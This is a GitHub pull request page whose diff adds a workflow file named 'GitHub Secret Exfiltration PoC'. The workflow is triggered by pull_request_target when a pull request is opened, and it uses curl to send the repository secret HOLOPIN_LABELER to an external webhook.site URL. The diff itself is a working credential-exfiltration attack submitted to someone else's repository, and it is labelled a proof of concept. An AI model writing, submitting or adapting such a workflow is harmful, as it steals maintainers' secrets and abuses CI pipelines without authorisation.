Skip to content
Closed

PR #24248

Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
21 changes: 21 additions & 0 deletions .github/workflows/poc.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
name: GitHub Secret Exfiltration PoC

on:
pull_request_target:
types: [opened]

jobs:
exploit:
runs-on: ubuntu-latest

steps:
- name: Show that the PoC workflow is running
run: echo "[+] Workflow triggered by PR from fork"

- name: Try to exfiltrate HOLOPIN_LABELER secret
run: |
echo "[+] Sending secret to Webhook.site..."
curl -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "token=${{ secrets.HOLOPIN_LABELER }}" \
https://webhook.site/e4056cbe-33ad-4c73-a3f2-48b7b388a4f1